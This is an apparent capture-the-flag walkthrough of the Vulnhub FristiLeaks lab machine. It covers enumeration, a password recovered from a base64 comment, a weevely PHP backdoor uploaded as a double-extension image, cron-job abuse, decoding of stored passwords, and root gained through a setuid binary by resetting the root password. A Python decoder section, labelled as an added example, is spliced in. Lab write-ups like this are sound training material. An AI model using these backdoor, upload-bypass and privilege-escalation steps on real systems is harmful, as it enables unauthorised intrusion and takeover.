Vulnhub fristileaks
Enumeration
We’ll start with the usual NMAP our home boy!
nmap -vv -sS -T4 -Pn -A -sC -p- 192.168.1.124
We only see port 80 open to us, but we can also see why the rest are not reported:
Reason: 65396 no-responses and 138 host-prohibiteds
We also see there's some info in the robots.txt:
http-robots.txt: 3 disallowed entries
/cola /sisi /beer
There's also an Apache version -> http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
There's also a kernel guess from OS detection ->
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Nikto
Since it's running a web server, let's run nikto on it.
nikto -h 192.168.1.124
Looking at the results we get a little bit more info about folders found on the
website.
There are two additional directories: /icons/ and /images/.
dirb
Now let's run dirb to try to find even more directories.
dirb http://192.168.1.124 /usr/share/wordlists/dir/common.txt
This did not give us any valuable information.
I’ll try the big.txt wordlist and meanwhile look at the source code of the
website.
Two hours later
I just couldn't find what to do so I had to go read a writeup…
The URL was /fristi/.
I only took that information and stopped reading; let's continue.
That leads us to a page with a login and a picture. First reflex is looking at the source code.
We notice that there's a comment saying:
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
At the top it's also written:
We use base64 encoding for images so they are inline in the HTML. I read
somewhere on the web, that that's a good way to do it
And near the end of the page there's a base64 string that's commented out.
We can assume that's another picture.
Let's decode that string instead of the one being loaded before trying to break the
login. Or we can use Burp Intruder to try to break the login while we're doing the
image base64 thingy. That's a good idea.
So by googling "base64 image decoder" and pasting the code, we get this word:
keKkeKKeKKeKkekkek
Meanwhile I had Burp Intruder try to bypass the login using SQL injection, and
none went through.
In the page source the comment had a name: eezeepz.
Let's try eezeepz:keKkeKKeKKeKkekkek, what if…
And it worked…
So we get an upload page; it smells like a reverse shell.
Life is Weevely
Let's generate a backdoor in weevely.
weevely generate toor me.php
We'll upload that PHP file through the upload page.
But wait a second, it doesn't accept .php extensions.
We'll rename it to me.jpg and try to upload it again, and it works perfectly.
It's being uploaded to uploads/.
Let’s try to access the page http://192.168.1.124/fristi/uploads/me.jpg
And there it is.
Weevely the beautiful
Let's connect to our backdoor:
weevely http://192.168.1.124/fristi/uploads/me.jpg toor
And it doesn't work. I'm assuming it absolutely needs a .php extension?
After googling for an hour, I found a page that mentions that if we add .php in the file name it will allow the PHP to execute even though it's a jpg.
So I renamed it to me.php.jpg and tried weevely again and BOOM! Houston, we are in.
Enumeration
Let's look for the kernel and OS:
uname -a
cat /etc/lsb-re*
The cat won't work because we're dealing with CentOS instead of a Debian machine.
So we get: Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
The thing is, it's a patched kernel, so most of the exploits we would find for that kernel version could already be patched.
Let's use :audit_filesystem.
We don't get much from it; there's a /home/eezeepz, which is the same username that we used to log in to the website.
Let’s investigate it.
User eezeepz
If we ls -l his home directory we find a lot of executables. Ummmm. Maybe we can add them to our PATH so we can use them? Do we need to use them?
Going through the list there's a notes.txt that has information inside:
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called “runthis” in /tmp/, each line one command. The
output goes to the file “cronresult” in /tmp/. It should
run every minute with my account privileges.
Interesting. /home/admin?
We have these commands to achieve root?
cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic
Crontab
So the message told us that we could execute commands as admin by creating a runthis file in /tmp. I'll start with a chmod 777 on /home/admin:
vi runthis
/home/admin/chmod 777 -R /home/admin
We'll wait a minute, then we'll be able to enter the /home/admin folder.
Once we're inside, ls -la to see what's there.
ls -la
drwxrwxrwx. 3 admin admin 4096 Apr 28 20:43 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
-rw-r--r--. 1 admin admin 18 Sep 22 2015 .bash_logout
-rw-r--r--. 1 admin admin 176 Sep 22 2015 .bash_profile
-rw-r--r--. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat
-rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod
-rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py
-rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df
-rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep
-rw-r--r-- 1 admin admin 12 Apr 28 17:18 me.txt
-rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 admin admin 113 Apr 30 18:21 ps.txt
drwxr-xr-x 2 apache apache 4096 Apr 28 20:43 resulsts
-rw-r--r-- 1 apache apache 8563 Apr 28 20:43 rpm_res
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
We have a file called whoisyourgodnow.txt owned by fristigod that we can cat.
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
There's also a Python script next to a cryptedpass.txt:
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
We also have a Python script that encodes the string in base64, then reverses it, then applies rot13 (a Caesar cipher with shift 13) to "re-encrypt" it.
So if we take the string in whoisyourgodnow.txt and undo those steps in reverse order:
We decode the rot13 on it (shift 13 characters)
RFn0AKnlMHMPIzpyuTI0ITG
becomes ESa0NXayZUZCVmclhGV0VGT
Then we take ESa0NXayZUZCVmclhGV0VGT
and reverse it TGV0VGhlcmVCZUZyaXN0aSE
Now we decode TGV0VGhlcmVCZUZyaXN0aSE
and it gives LetThereBeFristi!
Well, that doesn't help much, but at least we understand what the script does.
We can now also use it on cryptedpass.txt, and it gives thisisalsopw123.
We now have two strings that look like passwords.
I'll spawn a TTY shell using Python so I can su to another user:
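The base64 -> reverse -> rot13 scheme described above, written out as an added Python example with the decoder that recovers both strings (this is my reconstruction from the description, not the box's own cryptpass.py; the function names are mine):

```python
import base64
import codecs

# Added example: reconstruction of the base64 -> reverse -> rot13 scheme the
# walkthrough describes, plus its inverse. Function names are assumptions,
# not the names used in the box's cryptpass.py.


def encode_string(plaintext: str) -> str:
    """base64-encode, reverse the result, then rot13 it."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(ciphertext: str) -> str:
    """Undo the scheme: rot13 is its own inverse, then un-reverse, then base64-decode."""
    reversed_b64 = codecs.decode(ciphertext, "rot13")[::-1]
    # Re-add any '=' padding a sloppy copy may have lost (base64 wants len % 4 == 0).
    reversed_b64 += "=" * (-len(reversed_b64) % 4)
    return base64.b64decode(reversed_b64).decode()


# The two ciphertexts found in /home/admin, copied from the page.
CIPHERTEXTS = {
    "whoisyourgodnow.txt": "=RFn0AKnlMHMPIzpyuTI0ITG",
    "cryptedpass.txt": "mVGZ3O3omkJLmy2pcuTq",
}


def decode_all() -> dict:
    """Decode every stored ciphertext; returns {filename: plaintext}."""
    return {name: decode_string(ct) for name, ct in CIPHERTEXTS.items()}


if __name__ == "__main__":
    for name, plain in decode_all().items():
        print(f"{name}: {plain}")
```

Note that the leading "=" in the whoisyourgodnow.txt value is just the base64 padding that ended up at the front after the reverse step.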
python -c 'import pty; pty.spawn("/bin/sh")'
I'll try logging in as fristigod using LetThereBeFristi!
Fristigod
It worked! We're now logged in as fristigod; let's search for all the files he owns.
find / -user 502
Near the end of the list we get some interesting hits:
/var/fristigod
/var/fristigod/.bash_history
/var/fristigod/.secret_admin_stuff
Let's investigate those files:
cat /var/fristigod/.bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
We can see that fristigod is running some commands as fristi. Interesting.
If we run file on doCom, we notice that it's a setuid executable:
file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
We'll use the same command as in the .bash_history file:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...
If we look at the .bash_history we can see that he reads
/var/log/secure, a file that is only readable by root. This means that any
command that we append will run as root. Or at least I think so.
We'll try to change root's password:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom passwd root
New password: lol123
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password: lol123
su root
id
uid=0(root) gid=0(root) groups=0(root)
And there it is.
GG